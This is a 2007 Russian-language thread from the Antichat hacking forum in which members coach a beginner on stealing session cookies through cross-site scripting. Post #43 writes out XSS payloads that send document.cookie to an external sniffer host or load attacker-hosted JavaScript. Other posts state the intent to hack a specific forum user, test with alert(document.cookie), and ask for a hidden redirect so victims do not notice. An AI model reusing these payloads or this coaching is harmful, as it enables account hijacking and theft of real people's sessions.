ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО_OLD > Статьи > Избранное
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #41  
Старый 07.12.2007, 20:16
Taurus0688
Новичок
Регистрация: 01.07.2007
Сообщений: 11
Провел на форуме:
316892

Репутация: 10
По умолчанию

Цитата:
Сообщение от Tigger  
Скажите пожалуиста...а как наити xss в воруме каком-нибудь?
Парень ты не туда забрёл=) вот ссылка на нужную тебе тему http://forum.antichat.ru/thread20140.html
 

  #42  
Старый 07.12.2007, 23:41
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

Цитата:
Сообщение от Taurus0688  
Парень ты не туда забрёл=) вот ссылка на нужную тебе тему http://forum.antichat.ru/thread20140.html
Был там..но не понл куда именно впмсывать скрипт...в сам саит...привиде пример плизз))
 

  #43  
Старый 08.12.2007, 00:31
Taurus0688
Новичок
Регистрация: 01.07.2007
Сообщений: 11
Провел на форуме:
316892

Репутация: 10
По умолчанию

Цитата:
Сообщение от Tigger  
Был там..но не понл куда именно впмсывать скрипт...в сам саит...привиде пример плизз))
Впринципе там всё понятно написано
1
Код:
Название сайта жертвы/free?p='><script>img=new Image();img.src="Ссылка на твой снифер(Лучьше всего s.netsec.ru зарегься там) ?"+document.cookie;"+document.cookie;</script>
2
Либо Регишься к примеру на народе тобиш яндекс создаёшь ява скрипт можно воспользоваться редакторо Dremweaver 8 там всё понятно расписано

Код:
Название сайта жертвы/free?p='><script src=http://Твой ник в народе .narod.ru/js.js></script>
Исходник дан в скрипте

2.Более сложный способ!Залить линк на свой снифер через админку , но для этого собственно нужен доступ=) Я сам в принципе новичок у меня всего один раз получалось как банер заливать
 

  #44  
Старый 08.12.2007, 00:33
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

я захотел взломать чела на форуме и отослал ему ссылку на мои сниффер http://s.netsec.ru/plum.gif
он перешел по неи, но ко мне пришло пустое поле стринг=(( в чем непральность запроса?
Заранее спасибо
P.S не посылаите в другие маста...напишите более подробно и понтно новичку...хочу научитс))
 

  #45  
Старый 09.12.2007, 01:44
NilsonUA
Познающий
Регистрация: 25.11.2007
Сообщений: 55
Провел на форуме:
493288

Репутация: 58
Отправить сообщение для NilsonUA с помощью ICQ
По умолчанию

в том что не добавил куки. читай там же не просто ссыль дается а ссыль с хищением кук того они тебе и не пришли
 

  #46  
Старый 09.12.2007, 11:01
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

Цитата:
Сообщение от NilsonUA  
в том что не добавил куки. читай там же не просто ссыль дается а ссыль с хищением кук того они тебе и не пришли
Где там читать то? в какой теме? скинь ссылку плизз
 

  #47  
Старый 09.12.2007, 23:51
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

поня где читать....но как его подать то если надо писать тэг <script> но в форумах он не пашет...а если к ссылке добоволять +document cookie то он пишет в поле стринг document.cookie
 

  #48  
Старый 10.12.2007, 19:14
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

Я нашел Xss...
запрос подал вот так <script>alert(document.cookie)</script>
увидел свою сессию, а как сделать так что бы это отсылалось на мой сниффер и не только моя сессия=))?
 

  #49  
Старый 17.12.2007, 23:41
Impuls*
Познающий
Регистрация: 03.10.2007
Сообщений: 83
Провел на форуме:
213499

Репутация: 9
По умолчанию

АВТОР,
не мог бы ты сделать переадресацию?допустим жертва зашла на снифф, все ок и ее перекинуло, скажем на ya.ru так удобнее и как-то скрытнее...а если "куда переадресовывать" еще можно будет настраивать, то тебе просто огромнейшее спасибо!!!!!
 

  #50  
Старый 19.12.2007, 21:27
ground_zero
Постоянный
Регистрация: 11.10.2006
Сообщений: 659
Провел на форуме:
1594033

Репутация: 216


По умолчанию

iframe такая переадресация называетса
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Сниффер для аси Болталка 8 01.01.2009 21:38
Сниффер на netsec.ru NeMiNeM Болталка 8 09.12.2007 11:58



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ